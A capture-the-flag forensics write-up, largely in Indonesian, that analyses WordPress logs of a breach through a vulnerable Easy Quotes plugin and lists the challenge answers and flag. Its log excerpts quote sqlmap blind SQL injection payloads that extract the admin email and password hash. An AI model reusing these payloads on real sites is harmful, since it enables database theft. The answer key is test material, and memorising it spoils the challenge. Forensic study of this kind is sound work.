Log
description
Author: daffainfo
My website has been hacked. Please help me answer the provided questions using the available logs!
Attachments
unzip log_log-dist.zip
# Archive: log_log-dist.zip
# inflating: dist-log.zip
unzip dist-log.zip
# Archive: dist-log.zip
# inflating: error.log
# inflating: access.logConnect to Netcat Challenge
untuk melihat pertanyaan dan mencoba jawaban lakukan netcat ke server challenge dengan port yang diberikan.
nc challenges.1pc.tf <port>
karena kita akan menjawab beberapa pertanyaan, kita bisa langsung coba jawab semua pertanyaan sekaligus dengan memberikan input yang dipisahkan dengan newline (\n) dengan perintah echo dan pipe ke netcat seperti berikut:
echo -e "182.8.97.244\njawabanno2" | nc challenges.1pc.tf 24868
ini membantu untuk mengotomasi proses pengiriman jawaban ke server challenge, terutama jika ada banyak pertanyaan yang harus dijawab. Dengan menggunakan
echo -edan\n, kita bisa memastikan bahwa setiap jawaban dikirim pada baris baru, sesuai dengan format yang diharapkan oleh server challenge.
analisis
1. What is the Victim's IP address?
Required Format: 127.0.0.1
Solution
gunakan perintah berikut untuk mengekstrak semua alamat IP dari file log dan mengurutkannya secara unik:
grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' *.log | sort -uOutput:
access.log:1.10.1.21
access.log:127.0.0.1
access.log:165.22.125.147
access.log:182.8.97.244
access.log:219.75.27.16
error.log:165.22.125.147
error.log:172.18.0.1
error.log:172.18.0.3setelah itu lakukan brute force untuk ipnya karena hanya ada beberap ip saja.
grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' *.log | cut -d: -f2 | sort -u
# brute force ip
grep -hEo '([0-9]{1,3}\.){3}[0-9]{1,3}' *.log | sort -u | while read IP
do
RESULT=$(printf "%s\n" "$IP" | nc -w 1 $HOST $PORT)
if echo "$RESULT" | grep -q "Status: Correct"; then
echo "[+] FOUND Victim IP: $IP"
break
else
echo "[-] Wrong: $IP"
fi
done
182.8.97.244
2. What is the Attacker's IP address?
Required Format: 127.0.0.1
Solution
karena sebelumnya kita menggunakan perintah cat dan melihat secara manual. saya menemukan tool alternatif yaitu goaccess
install goaccess
sudo apt install goaccessgunakan goaccess untuk menganalisis file log dan menampilkan statistik termasuk IP address yang paling sering muncul:
goaccess access.log --log-format=COMBINED
goaccess access.log --log-format=COMBINED -o report.html
219.75.27.16
3. How many login attempts were made by the attacker?
Required Format: 1337
Solution
kita coba grep bagian login di file log
grep -i "login" *.log | grep -i post
# namun ketika saya cek lagi ktia juga perlu filter untuk status code 200 karena kemungkinan ada beberapa login attempt yang gagal, atau hanya redirect saja.
grep -i "login" *.log | grep -i post | grep 200
grep -i "login" *.log | grep -i post | grep 200 | wc -loutput:
6
4. Which plugin was affected (Full Name)?
Required Format: -
Solution
karena kita tahu dari log sebelumnya bahwa ada beberapa request yang mengarah ke /wp-login.php maka kita bia lakukan grep wp-content/plugins untuk melihat plugin apa saja yang diakses oleh attacker, kita juga gunakan sed untuk membersihkan bagian timestamp dan informasi lain yang tidak perlu, lalu sort dan uniq untuk mendapatkan daftar plugin yang unik.
cat *.log | grep "wp-content/plugins" | sed 's/\[.*\] //' | sort | uniq
namun ketika saya coba jawab dengan easy-quotes, dan easy quotes ternyata jawabanya salah, jadi saya coba cari di google. dan menemukan nama plugin yang benar.
Easy Quotes
5. What is the CVE ID?
Required Format: CVE-XXXX-XXXX
solution
kita bisa mencari CVE ID yang terkait dengan plugin Easy Quotes yang kita temukan sebelumnya. kita coba cari di website wpscan plugins karena dia memiliki database yang cukup lengkap untuk CVE plugin wordpress.
akhirnya saya menemukan CVE nya di halaman berikut
CVE-2025-26943
6. Which tool and version were used to exploit the CVE?
Required Format: tool_name/13.3.7
Solution
karena ktia tahu bahwa CVE tersebut adalah CVE-2025-26943 yang merupakan CVE utnuk sql injection. jadi kita coba cek apakah ada log yang berkaitan dengan tool wpscan, atau sqlmap
cat *.log | grep "wpscan" | sed 's/\[.*\] //' | sort | uniq
cat *.log | grep "sqlmap" | sed 's/\[.*\] //' | sort | uniq
sqlmap/1.10.1.21
7. What is the email address obtained by the attacker?
Required Format: r00t@localhost.xyz
Solution
karena kita tahu bahwa attacker menggunakan sqlmap untuk mengeksploitasi CVE tersebut, kemungkinan besar dia berhasil mendapatkan email address dari database. jadi kita coba grep user_email
grep "user_email" access.logoutput:
219.75.27.16 - - [11/Jan/2026:13:02:18 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E64%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 724 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:19 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E96%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 724 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:20 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E112%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 725 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:20 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E104%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 725 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:20 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E100%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 725 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
219.75.27.16 - - [11/Jan/2026:13:02:20 +0000] "GET /wp-json/layart/v1/fonts?family=1%27%20AND%20%28SELECT%201146%20FROM%20%28SELECT%28SLEEP%281-%28IF%28ORD%28MID%28%28SELECT%20IFNULL%28CAST%28user_email%20AS%20NCHAR%29%2C0x20%29%20FROM%20wordpress.wp_users%20ORDER%20BY%20ID%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E98%2C0%2C1%29%29%29%29%29txje%29--%20ugUY HTTP/1.1" 200 724 "http://165.22.125.147/wp-json/layart/v1/fonts?family=1" "sqlmap/1.10.1.21#dev (https://sqlmap.org)"
# ---
Dari access log terlihat attacker menggunakan sqlmap time-based blind SQL injection untuk mengekstrak nilai user_email dari tabel wordpress.wp_users.
Contoh payload di log:
SELECT IFNULL(CAST(user_email AS NCHAR),0x20)
FROM wordpress.wp_users
ORDER BY ID LIMIT 0,1Kemudian sqlmap menggunakan teknik:
ORD(MID(..., position, 1)) > valueuntuk menebak karakter satu per satu berdasarkan ASCII. Contoh bagian penting dari log:
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>64 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>96 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>112 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>104 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>100 ...
... ORD(MID((SELECT IFNULL(CAST(user_email AS NCHAR),0x20) FROM wordpress.wp_users ORDER BY ID LIMIT 0,1),1,1))>98 ...Nilai-nilai ASCII tersebut adalah:
64 = @
96 = `
112 = p
104 = h
100 = d
98 = bGunakan command berikut untuk mengekstrak nilai ASCII dan mengubahnya menjadi string email:
grep "user_email" access.log | \
sed -E 's/.*%21%3D([0-9]+).*/\1/' | \
grep -E '^[0-9]+$' | \
awk '{printf "%c",$1}'output: admin@daffainfo.com
8. What is the password hash obtained by the attacker?
Required Format: -
Solution
kita lakukan hal yang sama seperti sebelumnya, namun kali ini kita cari user_pass karena biasanya password hash disimpan di field tersebut di database wordpress.
grep "user_pass" access.log | \
sed -E 's/.*%21%3D([0-9]+).*/\1/' | \
grep -E '^[0-9]+$' | \
awk '{printf "%c",$1}'
output: $wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW
$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW
9. When did the attacker successfully log in?
Required Format: DD/MM/YYYY HH:MM:SS
Solution
kita lakukan grep untuk mencari request yang mengarah ke wp-login.php dengan status code 302 (redirect setelah login sukses) untuk menemukan timestamp login yang berhasil.
grep "wp-login.php" access.log | grep " 302"output:
182.8.97.244 - - [11/Jan/2026:12:25:33 +0000] "POST /wp-login.php HTTP/1.1" 302 1275 "http://165.22.125.147/wp-login.php" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.56 Safari/537.36"
219.75.27.16 - - [11/Jan/2026:13:12:49 +0000] "POST /wp-login.php HTTP/1.1" 302 1275 "http://165.22.125.147/wp-login.php?redirect_to=http%3A%2F%2F165.22.125.147%2Fwp-admin%2F&reauth=1" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.56 Safari/537.36"
11/01/2026 13:12:49
Answer Questions
answers = [
"182.8.97.244",
"219.75.27.16",
"6",
"Easy Quotes",
"CVE-2025-26943",
"sqlmap/1.10.1.21",
"admin@daffainfo.com",
"$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW",
"11/01/2026 13:12:49"
]
for answer in answers:
print(answer)HOST=challenges.1pc.tf
PORT=47693
echo -e "182.8.97.244\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n6\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\n" | nc $HOST $PORT
echo -e "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\nsqlmap/1.10.1.21\n" | nc $HOST $PORT
# karena di password ada karakter khusus `$`, kita perlu escape dengan `\` atau gunakan single quotes untuk menghindari interpretasi shell.
# namun ketika saya coba gagal terus jadi alternatif saya gunakan printf yang lebih fleksibel untuk mengirimkan string dengan karakter khusus tanpa perlu khawatir tentang escaping.
printf "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\nsqlmap/1.10.1.21\nadmin@daffainfo.com\n" | nc $HOST $PORT
printf "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\nsqlmap/1.10.1.21\nadmin@daffainfo.com\n%s\n" '$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW' | nc $HOST $PORT
printf "182.8.97.244\n219.75.27.16\n6\nEasy Quotes\nCVE-2025-26943\nsqlmap/1.10.1.21\nadmin@daffainfo.com\n%s\n11/01/2026 13:12:49\n" '$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW' | nc $HOST $PORT
alternatif lain bisa menggunakan python
import socket
import sys
if len(sys.argv) != 3:
print(f"Usage: {sys.argv[0]} HOST PORT")
exit()
HOST = sys.argv[1]
PORT = int(sys.argv[2])
s = socket.socket()
s.connect((HOST, PORT))
def recv_until(target):
data = ""
while target not in data:
chunk = s.recv(1).decode()
if not chunk: break
data += chunk
print(data, end="")
return data
def send(msg):
s.sendall((msg + "\n").encode())
# Jawaban yang sudah pasti benar
answers = [
"182.8.97.244",
"219.75.27.16",
"6",
"Easy Quotes",
"CVE-2025-26943",
"sqlmap/1.10.1.21",
"admin@daffainfo.com",
"$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW",
"11/01/2026 13:12:49"
]
# Jalankan otomatis untuk jawaban yang sudah ada
for ans in answers:
recv_until("Your Answer:")
send(ans)
# Masuk mode interaktif untuk pertanyaan baru (Q3, dst)
while True:
# Baca sampai prompt muncul
data = ""
while True:
chunk = s.recv(4096).decode()
if not chunk: break
data += chunk
print(chunk, end="")
if "Your Answer:" in data or ":" in data:
break
# Input manual dan kirim
user_input = input(">> ")
send(user_input)python3 nc_quiz.py $HOST $PORT
flag
C2C{7H15_15_V3rY_345Y_3a4d4f3b57c1}